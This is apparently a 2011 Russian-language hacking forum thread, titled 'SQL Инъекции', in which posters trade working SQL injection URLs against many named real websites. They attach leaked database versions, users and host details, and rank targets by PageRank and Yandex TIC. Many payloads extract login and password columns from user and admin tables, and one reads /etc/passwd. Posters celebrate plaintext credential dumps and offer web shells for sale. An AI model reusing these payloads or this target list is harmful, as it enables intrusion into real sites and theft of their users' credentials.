Просмотр полной версии : SQL Инъекции
http://uprava.org/section.php?id=19&sub_id=-167%20and%201=2%20union%20select%201,2,3,4,concat_ ws(0x3a,@@version,user(),database(),@@version_comp ile_os)+--
4.0.27-log uprava-org@fhe2.hoster.ru uprava-org portbld-freebsd7.0
PHP:
http://eurozvuk.ru/gallery/index.php?id=999999.9%27+UNION+ALL+SELECT+concat%2 80x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29 +as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343 830303536%2C0x31303235343830303536+and+%27x%27%3D% 27x
Target: http://eurozvuk.ru/gallery/index.php?id=2384
Host IP: 77.222.40.186
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8o mod_dp20/0.99.2 mod_python/3.3.1 Python/2.6.6 mod_ruby/1.2.6 Ruby/1.8.7(2010-08-16) mod_wsgi/3.3
DB Server: MySQL >=5
Resp. Time(avg): 475 ms
Current User: eurozvuk@localhost
Sql Version: 5.1.50-lk-log
Current DB: eurozvuk
System User: eurozvuk@localhost
Host Name: mesa
Installation dir: /usr/
Яндекс тИЦ (CY) 70
Google PageRank (PR) 3
PHP:
http://gretta.ru/catalog/card.php?cat=palio&id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x 27%2Cunhex%28Hex%28cast%28database%28%29+as+char%2 9%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536% 2C0x31303235343830303536%2C0x31303235343830303536% 2C0x31303235343830303536%2C0x31303235343830303536% 2C0x31303235343830303536--+a
Target: http://gretta.ru/catalog/card.php?cat=palio&id=1636
Host IP: 78.110.50.127
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 205 ms
Current User: icy0u3fz_gal2@c25-w.ht-systems.ru
Sql Version: 5.0.85-log
Current DB: icy0u3fz_gal2
System User: icy0u3fz_gal2@c25-w.ht-systems.ru
Host Name: db14.ht-systems.ru
Installation dir: /usr/local/
DB User: 'icy0u3fz_gal2'@'%'
Data Bases: information_schema
icy0u3fz_gal2
Яндекс тИЦ (CY) 100
Google PageRank (PR) 2
PHP:
http://landscrona.ru/tales/index.php?id=999999.9+UNION+ALL+SELECT+0x313032353 43830303536%2C0x31303235343830303536%2Cconcat%280x 7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as +char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536--
Target: http://landscrona.ru/tales/index.php?id=125
Host IP: 93.100.182.251
Powered-by: PHP/5.2.6-1+lenny10
Web Server: lighttpd/1.4.19
DB Server: MySQL >=5
Resp. Time(avg): 325 ms
Current User: ultrspru_data@localhost
Sql Version: 5.0.51a-24+lenny5
Current DB: ultrspru_data
System User: ultrspru_data@localhost
Host Name: landscrona
Installation dir: /usr/
DB User: 'ultrspru_data'@'localhost'
Data Bases: information_schema
ultrspru_data
Яндекс тИЦ (CY) 160
Google PageRank (PR) 3
PHP:
http://resurs.ua/index.php?id=2&more=21+and%28select+1+from%28select+count%28*%29% 2Cconcat%28%28select+%28select+concat%280x7e%2C0x2 7%2Cunhex%28Hex%28cast%28database%28%29+as+char%29 %29%29%2C0x27%2C0x7e%29%29+from+information_schema .tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29% 29x+from+information_schema.tables+group+by+x%29a% 29+and+1%3D1
Target: http://resurs.ua/index.php?id=2&more=21
Host IP: 91.197.128.231
Powered-by: PHP/5.2.13
Web Server: lighttpd/1.4.26
DB Server: MySQL error based
Resp. Time(avg): 80 ms
Sql Version: 5.0.77
Current DB: resursbase
Host Name: amgroup01.art-hosting.net.ua
Installation dir: /usr/
Яндекс тИЦ (CY) 30
Google PageRank (PR) 2
Тут БД с логин-пасс в открытом виде. Наслаждайтесь. Пару мыльников попалось с довольно таки крутыми доменами XD
http://www.benzrealty.com.au/content.php?page_id=-8+/*!UnIon+selECt+version%28%29*/
5.1.52
Cennarios
07.06.2011, 21:15
crime-maps.org
http://crime-maps.org/documentation_centre/centre/newsletter/newsletter_issue.php?i_=-45+union+select+1,concat%28file_priv,0x3a3a,User%2 9,3+from+mysql.user+limit+0,1--+&a_=395
Таким образом подбираем существующую таблицу:
http://www.photoindustria.ru/?mod=contest&id=14+union+select+null,null,null,null,null,null+f rom+ABCDEF
Если ABCDEF заменить на USERS - запроспроходит.
Далее подбираем поля:
http://www.photoindustria.ru/?mod=contest&id=14+union+select+users.pass,null,null,null,null, null+from+users
Если вместо pass написать password - запрос проходит.
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,v ersion%28%29,database%28%29,user%28%29,@@version_c ompile_os%29,10,%2011,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 ,55,56,57,58,59,60,61,62,63,64+--+
winstrool
09.06.2011, 04:25
pr5 ТИЦ 20
http://www.fenetreeurope.com/php/page.php?section=actu&id=-21190%27+union+select+1,2,3,4,concat_ws%280x3a,use r%28%29,version%28%29,database%28%29%29,6,7+--+
fenetreeurope@localhost:5.0.45:dbfenetreeurope
pr1
http://buket-iz-konfet.com.ua/pages.php?page=14+union+select+1,2,3,concat_ws(0x3 a,user(),version(),database())+--+
buketizkonfet@localhost:5.1.51:buketizkonfet
pr2
http://tonometr-shop.com.ua/pages.php?page=13+union+select+1,2,3,concat_ws%280 x3a,user%28%29,version%28%29,database%28%29%29--
buketizkonfet@localhost:5.1.51:buketizkonfet
http://www.kharkovapartment.com.ua/order.php?id=17000+union+select+1,concat_ws%280x3a ,user%28%29,version%28%29,database%28%29%29+--+
kharkovapartment@localhost:4.0.27:kharkovapartment
https://www.davidrayrobinson.com/order.php?id=-1+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION +SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID %28%28select+concat_ws%280x3a,user%28%29,version%2 8%29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%28 0%29*2%29%29%29--+
drobinson@localhost:5.0.27:business_data
http://www.mogilev.biz/company/?r=-17%20and%201=2%20union%20select%201,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,concat_ws(0x3a,@@version,user (),database(),@@version_compile_os),34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50--
5.1.44-community-log shuniamogilev@localhost mogilevbiz_mogilev unknown-linux-gnu
SpaceMan
09.06.2011, 22:00
http://www.white-ship.ru/index.php?id=7-999.9+union+select+1,2,3,version%28%29,5,6,7,8,9,1 0--
вывод в Title
SergioRezza
10.06.2011, 10:55
Code:
http://www.be-on.net/products.php?id=-230+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--
Code:
http://www.dfki.de/lt/card.php?id=-94+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30--
Code:
http://housewives.org.ua/text.php?id=-692+union+select+1,2,3,4,version()--
Code:
http://jericho.org.ua/text.php?id=-682+union+select+1,2,3,4,version()--
Code:
http://www.tradevoyage.by/new.php?id=-142+union+select+1,2,3,4,version(),6,7,8,9,10--
Code:
http://www.thaiware.com/main/info.php?id=-2955+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35--
Code:
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,version()--
Code:
http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,version(),5--
Code:
http://www.gammabook.ru/news.php?id=-82+union+select+1,concat_ws(0x3a,id,name,password) ,3,4,5,6+from+users--
Code:
http://www.stinkyjournalism.org/editordetail.php?id=-671+union+select+1,concat_ws(0x3a,admin_id,admin_n ame,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+ admin--
Code:
http://www.garo.cc/item.php?id=-879+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2
Code:
http://www.noborder.org/item.php?id=-383+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
позже выложу "сочные"
SergioRezza
10.06.2011, 11:32
http://adu.org.za/staff_page.php?staff_id=-31+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15--
http://www.jumbocast.net/staffdetails.php?staff_id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11--
http://www.milim.com/gallery.php?id=-163+union+select+1,version(),3,4--
Работа и вакансии Белгорода
http://www.r31-rabota.ru/index.php?id=-75%20and%201=2%20union%20select%201,2,concat_ws(ch ar(58),@@version,user(),database(),@@version_compi le_os),4+--
5.1.54 r31-rabota@localhost r31-rabota portbld-freebsd8.1
winstrool
10.06.2011, 15:35
pr3 тиц 10
http://www.ticketon.ru/places.php?id=15700000000+union+select+1,concat_ws %280x3a,user%28%29,version%28%29,database%28%29%29 ,3,4,5,6,7,8+from+sbilet_users+--+
u73487@10.8.0.216:5.0.90-log:u73487
pr3 тиц 60
http://mospf.ru/order.php?id=-1+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29%29,3,4,5+--+
mospf_ru@zvm7.host.ru:5.0.92-log:mospf_ru
http://www.antiquesincanada.com/shop.php?myID=-398 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23
http://www.lifesaving.org/image_shop_lrg.php?article_id=-41 union select 1,version()--+
Обязателен рефер с сайта.
http://www.karmavore.ca/shop.php?pcatid=7&cat=-87 union select version()--+
http://www.flyermall.com/community/msg_preview.html?cid=-15%20union%20select%201,version%28%29,3--+
SergioRezza
11.06.2011, 15:32
http://www.simbin.se/news.php?newsid=-153+union+select+1,concat_ws(0x3a,ID,USERNAME,PASS WORD),3,4,5+from+USERS+where+ID=15--
nemaniak
12.06.2011, 02:49
virtualjerusalem.com PR-7
Code:
http://www.virtualjerusalem.com/news.php?Itemid=3147+and+substring((select+version ()),1,1)=5+--+
njsa.com PR-5
Code:
http://www.njsa.com/memoview.php?newsid=-194+union+select+1,2,3,4,concat_ws(version(),user( ),database()),6,7,8,9,10+--+
Code:
70776_njsa@lnh-www1e.bluehalo.myregisteredsite.com5.0.7770776_njs a
bloodAngel
12.06.2011, 15:18
Code:
http://www.ashbyschool.org.uk/news/news_view.php?id=105-999.9+union+select+1,version%28%29,database%28%29, 4,5,6,7,8--
4.1.22-log ashbyschooldb
Пр 4
Code:
http://www.javaportal.ru/books/aboutbook.php?id=30-999.9+union+select+1,database%28%29,version%28%29, 4,5,6,7,8,9,10,11,12--
Тиц 100 Пр 4
Code:
http://www.globalfutureevents.com/event.php?id=-487+union+select+1,2,3,version(),database(),user() ,7--
5.1.57 / fesu_db / fesu_usr@localhost
Тиц10 Пр 3
SergioRezza
12.06.2011, 16:58
http://colortek.by/show.php?id=434&t=-13+union+select+version()--
http://www.chgk.com.ru/person.php?id=-49+union+select+1,2,concat_ws(0x3a,name,pass),4,5, 6,7+from+user--
http://lit.phil.pu.ru/person.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,name,pas sword),8+from+users--
http://hotel-escort.ru/person.php?id=-59+union+select+1,2,3,4,version(),6,7--
http://www.mebelinfo.ru/base.php?tip=4&id=-34+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18--
http://fikomed.ru/base.php?id=-8+union+select+1,2,version(),4,5--
http://www.riff-fanzine.com/InfoArticulo.php?idArticulo=63-999.9+union+select+1,version(),3,4,5,database(),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
SergioRezza
12.06.2011, 20:46
тИЦ 30
http://stairsoflove.ru/write.php?id=-36271+union+select+1,2,3,version(),5,6--
тИЦ 10
http://heartmir.ru/write.php?id=-360+union+select+1,version(),3,4,5--
тИЦ 30
http://moy-snegovik.ru/write.php?id=-11910+union+select+1,2,3,version(),5,6--
тИЦ 10
http://www.usadiba.ru/dom.php?id=-468+union+select+version(),2,3,4,5,6,7,8--
Компьютерный, молодёжный сленг и жаргон
Code:
http://slanger.ru/?mode=library&sl_id=-1095+union+select+1,table_name,3,4,5,6,7+from+info rmation_schema.tables+--+
тИЦ: 30 PR: 3
Вывод под датой
Code:
http://www.worstpreviews.com/headline.php?id=-16827+union+select+1,2,3,version(),5,6,7,8+--+
Не могу раскрутить
Code:
http://www.vizzed.com/vizzedboard/thread.php?id=4290'
Code:
http://tajik-gateway.org/index.phtml?lang=ru&id=-535+union+select+version(),2--+
Code:
http://kluchbulgaria.com/index.php?menu=12&lang=ru&id=1246+union+select+1,2,version(),4,5--+
Code:
http://stylink.ru/kolgotky/index.html?action=sl&id=5258+UnIon+selECt+1,2,3,version(),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19--+
Code:
http://stroika.md/detail.php?id=1+UnIon+selECt+1,version(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28--+
Code:
http://tdlotos.com.ua/prod.php?id=-447+UnIon+selECt+1,concat_ws(0x3a,email,password), 3,4,5,6,7,8,9,10,11,12,13,14,15+from+users--+
Code:
http://russtyle-yug.ru/catalog.php?id=59302%27+union+select+concat_ws(0x3 a,login,pass),2+from+tbl_users--+
Code:
http://prokatavto.com.ua/index.php?page=order&id=42+UnIon+selECt+1,2,3,group_concat(column_name) ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+i nformation_schema.columns+where+table_name=0x68636 c5f6f70657261746f7273--+
Code:
http://julietta.com.ua/index.php?r=3&c=3&id=-84+union+select+version(),2--+
Code:
http://ulgaz.ru/index.php?mode=news&id=-184+union+select+concat_ws(0x3a,login,pass),2,3+fr om+users--+
Корпоративный сайт ООО "Ульяновскоблгаз"
http://www.semes.org/sociedades_detalle.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database())+from+information_schema.columns--
semes@localhost:5.0.51a-24+lenny5
http://www.north-southglobal.org/conferencias/info_organigrama.asp?ID=-1+union+select+*+from+msysobjects+in+'.'
http://www.2coma11.com/img_proyecto.php?id=-66+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5--&refresh=
coma11@localhost:5.1.32-log:bdcoma11
http://www.tyeg.tw/web_news_c_2.php?top_id=-2019+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14, 15,16,17,18,19,20,21,22,concat_ws(0x3a,user(),vers ion(),database()),24,25,26,27,28--
tyeg@localhost:5.0.77:tyeg
http://w3.tyh.com.tw/medweb/php/drugchange.php?id=-824+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0--
his@localhost:4.0.21-log:tyh
Cennarios
16.06.2011, 07:31
http://ozone.unep.org/new_site/en/notes.php?country_id=1%29+union+select+1,2,unhex%2 8hex%28user%28%29%29%29--+
http://www.mir-tv.ru/help.php?id=-2+UNION+SELECT+1,2,version%28%29,4--
5.1.41-log
http://www.position1.ru/index-1.php?id=-46+UNION+SELECT+1,2,3,version%28%29,5--
5.0.90
тИЦ CY 80
PR 2
http://www.bolshie.ru/help.php?id=-4+union+select+1,2,3,4,version%28%29--
5.0.90-log
SergioRezza
18.06.2011, 14:49
http://www.elportal.ru/stat.php?id=-62+union+select+version()--
тИЦ 20
5.0.85-log
_________________________________
http://www.facebookcounter.ru/stat.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9--
5.0.91
________________________________
http://www.skladobzor.ru/stat.php?id=-23+union+select+version()--
тИЦ 10
5.0.85-log
_______________________________
http://www.pogruzchikservice.ru/index.php?t=stat&id=-4+union+select+version()--
тИЦ: 60
5.0.85-log
______________________________
http://www.itkt.ru/prod.php?id=-40+union+select+version()--
тИЦ: 40
4.1.25-log
Atarvala
18.06.2011, 17:56
http://penzlyk.com/biography.php?arts=10+and+1=0+union+select+concat_ ws(0x3a3a3a,user(),database(),version())+--+
kravchluba_baza@localhost:::kravchluba_penzlyk:::5 .0.67-community
http://www.plantdesignsolutions.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,COnCat_WS(0x 3a,version(),user(),database()),5,6,7,8
5.0.91-log: : plantdesignusr@97.74.24.46: : plantdesignusr
http://www.ibis.dk/presse/showarticle.php?id=-4256++UnIoN+AlL+sElEcT+CONCAT_WS(CHAR(32,58,32),us er(),database(),version())--
@localhost : ibis_web : 5.0.22-Debian_0ubuntu6.06.15-log
winstrool
18.06.2011, 23:20
вот старьевщина у меня заволялась))
тиц 30
http://www.captainsofcrush.ru/grippers/info.php?id=-13+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8+--+
5.0.91-community:captains_crush@localhost:captains_crush
pr2 тиц 20
http://www.medium-plus.ru/print.php?in=-22+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29,2,3+--+&ac=info&m1=2&m2=6
medium-plus@localhost:5.0.77:medium-plus
pr4 тиц 140
http://www.itrex.ru/index.php?option=com_itrexptc&ptcPage=tr&id=-707%27+and+1=1+OR+%28SELECT+COUNT%28*%29+FROM+%28S ELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY +CONCAT%28MID%28%28select+concat%28user%28%29,0x3a ,version%28%29,0x3a,database%28%29%29%29,1,63%29,+ FLOOR%28RAND%280%29*2%29%29%29+--+
itrexru@localhost:5.0.77:itrex_db
http://www.gumata.com/product.php?id=-47+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29+--+
gumata_gumata@localhost:5.0.92-community:gumata_gumata
pr6 тиц 190
http://ndce.edu.ru/publ_info.php?id=-78+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11,12, 13,14,15,16--
lab130@localhost:5.0.91-log:catalogue
FILE_PRIV=Y
pr4
http://www.ditc.us/news-events/articles/article.php?id=-100+union+select+1,2,3,4,5,concat_ws%280x3a,user%2 8%29,version%28%29,database%28%29%29,7,8,9,0,11,12 ,13,14,15,16,17,18,19,0,21,22,23,24--
ditcus@76.12.19.204:5.0.27-standard:ditcus
тиц:160 пр4
http://www.nukri.org/index.php?module=Recipes&func=display&lid=-4+union+select+1,unhex%28hex%28concat_ws%280x3a,us er%28%29,version%28%29,database%28%29%29%29%29,3,4 ,5,6,7,8,9,0,11,12,13,14,15,16,17,18+--+
nukri2@localhost:4.1.18-standard:db_nukri2
уников в день 1500
pr5
http://www.thecis.ca/index.php?catID=38&itemID=4690000000+union+select+1,2,concat_ws%280x3 a,user%28%29,version%28%29,database%28%29%29,4,5,6 ,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
cistudies@localhost:5.1.56-rs:cistudies
pr1
http://www.yaptik.biz/modules/articles/article.php?id=114+union+select+1,2,3,4,5,6,concat _ws%280x3a,user%28%29,version%28%29,database%28%29 %29,8,9,0,11,12,13,14,15,16,17,18,19,20--
ycolasan_biz@localhost:5.1.54-log:ycolasan_biz.
pr5
http://www.baltwashchamber.org/content.php?sid=2&id=50&content=3&parentid=65+union+select+1,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29+--+
bwcctest@204.13.10.22:aimstar_bwcccms:5.1.24-rc-log
pr3 тиц 30
http://www.svvm-auto.ru/info.php?id=-11+union+select+1,2,3,4,concat_ws%280x3a,user%28%2 9,database%28%29,version%28%29%29,6,7+--+
zorro_svvm@localhost:zorro_svvm:5.0.51a-24+lenny4-log
Cennarios
19.06.2011, 04:31
Срослось! =)
http://www.iaea.org/nael/page.php?page=2125&recordID=-28/**//*!union*//**//*!select*//**/1,user%28%29,3,4,5,6,7,8,9,10--+
http://stepstation.com/posts.php?category=-11+union+select+1,concat_ws(0x3a,email,password),3 ,4,5+from+users--
---
http://www.estatefiesolana.it/index.php?id=-597+union+select+1,concat_ws(0x3a,user,password),3 ,4,5+from+mysql.user--
winstrool
19.06.2011, 16:52
тиц 50
http://www.talas-m.ru/info.php?id=-9+union+select+1,2,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,4,5+--+&t=resort
talasm01@localhost:5.1.56-log:wwwtalasmru_talasm01
тиц 10 pr2
http://www.otalant.ru/info.php?id=-7%27+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,0,11,1 2,13,14,15,16,17+--+
akademiach@localhost:5.0.26-lk-log:akademiach
тиц 20
http://www.vetclin.ru/article.php?id=-2%27+union+select+1,2,concat_ws%280x3a,user%28%29, database%28%29,version%28%29%29+--+
zubov@localhost:zubov517:5.0.67
тиц 40 pr3
http://www.itkt.ru/prod.php?id=-40+union+select+concat_ws(0x3a,user(),version(),da tabase())+--+
itktru99_itkt@localhost:4.1.25-log:itktru99_itktru
Code:
http://topnexia.ru/arcticles.php?id=-41+union+select+1,version%28%29,3,4,5+--+
version: 5.0.26-log
database: allesistgu_nexia
user: allesistgu_nexia@localhost
тИЦ: 10 | pr: 1
Code:
http://studyincors.ru/country.php?id=-1+union+Select+1,concat_ws%280x3a3a,version%28%29, database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+--+
version: 5.0.77-log
database: azanova_edu
user: azanova_edu@bitrix54.timeweb.ru
тИЦ: 0 | pr: 0
Code:
http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=-1+union+select+concat_ws%280x3a3a,version%28%29,da tabase%28%29,user%28%29%29,2,3+--+
version: 5.0.92-log
database: earthbu6_earthburgnew
user: earthbu6_me@localhost
тИЦ: 50 | pr: 3
Code:
http://eti.stankin.ru/index.php?table=grcms_post_menu&id=-1+union+select+1,2,3,4,concat_ws%280x3a,version%28 %29,database%28%29,user%28%29%29+--+
version: 5.1.28-rc
database: eti
user: eti@localhost
тИЦ: 10 | pr: 2
Злоупотребление алкоголем опасно для здоровья!
http://tatspirtprom.ru/production/catalog/balzami/balzami_30.html?template=-18%20and%201=2%20union%20select%201,2,3,4,concat_w s(0x3a,@@version,user(),database(),@@version_compi le_os),6,7--
5.0.83 u01586_tsp_ru@localhost u01586_tsp_ru portbld-freebsd6.4
SergioRezza
20.06.2011, 13:35
http://www.cmbc.ru/process.php?ID=1%27%20AND%201%3D2+UNION+SELECT+ver sion(),2,3+%23
тИЦ 110
PR 3
http://in-green.com.ua/product_info.php?products_id=1124+and+0=1+union+se lect+version()--
5.0.51a-24+lenny4-log
тИЦ 50
PR 3
//Хеши и пароли запрещены!
http://www.modflame.com/store.php?rid=-1+union+select+1,2,group_concat(email,':',password ),4,5+from+users;+--+
SergioRezza
20.06.2011, 17:48
http://www.tennis-piter.ru/ban.php?id=-116+union+select+1,2,3,4,version()--
PR: 3
ТИЦ: 210
ip: 38.101.219.98
сайты на одном ip,
Code:
http://lurkingnoob.com/file.php?id=-76+UnIoN+ALL+SeLeCt+1,2,3,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),5,6,7
5.1.37-1ubuntu5.4-log:broorho@localhost:ringtones:debian-linux-gnu
http://omfgif.com/gif.php?id=-9999999+AND+1=0+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,l oad_file(0x2f6574632f706173737764),11,12--
http://mediafetcher.com/article_full.php?id=888888888888888+UnIoN+ALL+SeLe Ct+1,2,3,4,5,concat_ws(0x3a,@@version,user(),datab ase(),@@version_compile_os),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28
5.1.37-1ubuntu5-log:uselessj_ohshitw@localhost:uselessj_uj2006:deb ian-linux-gnu
http://swagster.com/img.php?id=-242215+UnIoN+ALL+SeLeCt+1,2,3,4,5,6,7,version(),9, 10,11,12
5.1.37-1ubuntu5.1-log
http://www.broorho.com/image.php?uid=-13381+UNION+SELECT+1,version(),3,4,5
5.1.37-1ubuntu5-log
TABLES (http://pastebin.com/kcgDj3uT)
Яндекс тИЦ 3400
Google PageRank 9/10
Code:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(table_name)),3+from+in formation_schema.tables+limit+41,9+--+
Яндекс тИЦ 10
Google PageRank 5/10
Code:
http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46+from+users+--+
SergioRezza
22.06.2011, 00:18
http://www.apkhleb.ru/rus/press/news/?id=-1520+union+select+1,2,3,concat_ws(0x3a,id,login,pa ss,email),5,6,7,8+from+user+where+id=2--
PR: 4
ТИЦ: 450
http://www.konditerprom.ru/list/list.php?cid=-1+union+select+1,version()--
PR: 4
ТИЦ: 400
http://foodsmarket.info/wizard/view_unit.php?unit_num=1227%20%26%26%201%3D2%20UNI ON+SELECT+1,2,version(),4,5,6,7+%23
PR: 5
ТИЦ: 400
http://www.agromage.com/stat_id.php?id=782%27%20AND%201%3D2%20UNION%20SELE CT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2 C12%2C13%2C14%2C15%20%23
PR: 5
ТИЦ: 400
http://www.meatmarket.info/statinter.php?id=220%20%26%26%201%3D2+UNION+SELECT +1,2,version(),4,5,6,7,8,9,10+%23
PR: 4
ТИЦ: 240
http://www.yuk.ru/site/index/news.php?id=10%27%20AND%201%3D2+UNION+SELECT+1,2,v ersion(),4,5,6,7,8,9,10+%23
PR: 2
ТИЦ: 180
я ни одну скьюлю не крутил, возможно где-то сможете залить шелы)))
http://henryyanart.com/product.php?id=-100+union+select+1,2,3,4,5,6,7,8,9,10,group_concat (id,txn_id,payment_amount,payment_currency,item_na me,receiver_email,payer_email)+from+purchases
http://floridashorestruckcenter.com/store/product.php?d=-100+union+select+1,2,3,4,5,6,7,group_concat(table_ name)+from+information_schema.tables+where+table_s chema!=0x696e666f726d6174696f6e5f736368656d61
SergioRezza
22.06.2011, 13:14
http://www.vkf.ru/index.php?action=prod&type=detail&id=-391+union+select+1,2,3,4,version(),6,7,8,9,10,11--
PR: 3
ТИЦ: 170
http://www.1may.ru/news.php?p=27\'&n=35+and+1=2+union+select+version(),2,3--
PR: 3
ТИЦ: 130
http://www.ukrkonditer.kiev.ua/commerce/package_page.php?packid=89%20%26%26%201%3D2+UNION+ SELECT+1,version(),3,4,5,6,7,8%23
PR: 4
ТИЦ: 200
http://www.dverifortrez.ru/view_item.php?id=-294+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30--
PR: 4
ТИЦ: 600
http://www.lumstyle.ru/company/news.htm?news_id=-38+union+select+1,2,3,4,version(),6,7--
PR: 0
ТИЦ: 450
нужны шеллы? в лс
VDobridze
22.06.2011, 17:42
metuchenchamber.com
PR4
Code:
http://www.metuchenchamber.com/news.php?article=yes&id=-123%27%20union%20select%201,2,3,4,5,concat_ws%280x 3a,version%28%29,user%28%29,database%28%29%29,7,8, 9,10,11%27
holod_velesagro
5.1.45
holod_velesagro@localhost
Code:
http://www.velesagro.com/product.php?id=-129+union+select+1,2,3,database(),version(),user() ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
PR: 2
ТИЦ: 40
http://www.locosystech.com/product.php?id=-1+union+select+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16+from+information_schema .tables+where+table_schema!=0x696e666f726d6174696f 6e5f736368656d61
тИц 10
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,u ser,pass),6,7,8+from+userlist+limit+0,1)--+1
http://www.crest-gems.com/home.php?category_id=23+union+select+concat_ws(0x3 a,user_name,password),2,3,4,5+from+system_users--
pr 2
Agel Nash
23.06.2011, 16:42
http://www.sport-gym.ru/more.php?id=54&pid=0+UNION+SELECT+group_concat(TABLE_NAME)+%20FRO M%20INFORMATION_SCHEMA.TABLES%20--
http://www.mosteploseti.ru/index.php?idS=0+UNION+SELECT+1,@@version,3,4,5--
http://www.bainstuff.ru/shop.php?IDC=2&IDS=0+UNION+SELECT+1,2,3,99999999999999999--
http://www.rock-climbing.ru/text.php?ids=0+UNION+SELECT+99999999999999999999--
http://www.energostab.ru/help.php?ids=0+UNION+SELECT+1,group_concat(concat_ ws(%22:%22,login,password)),3,4,5+FROM+users--
http://www.sputnik-altai.ru/fotoalbum.php?p_id=-2+UNION+SELECT+1,1,1,1--
http://www.dinamo-altai.ru/fotoalbum.php?p_id=-2+UNION+SELECT+1,1,1,1--
http://www.alkor.regioninfo.ru/fotoalbum.php?p_id=-2+UNION+SELECT+1,1,1,1--
http://www.azkoyenrus.ru/question.phtml?&page=1&q_id=2&act=view&menu_id=2&qpart_id=0+UNION+SELECT+1,2,3,4,5,6,7--
http://www.infologics.ru/present/question.phtml?&page=1&q_id=2&act=view&menu_id=2&qpart_id=0+UNION+SELECT+1,2,3,4,5,6,7--
Смотреть title страниц
http://www.climatelab.ru/index.php?action=price&pid=2+UNION+SELECT+1,2,3,4,5,6,7,@@version,9,10,11--
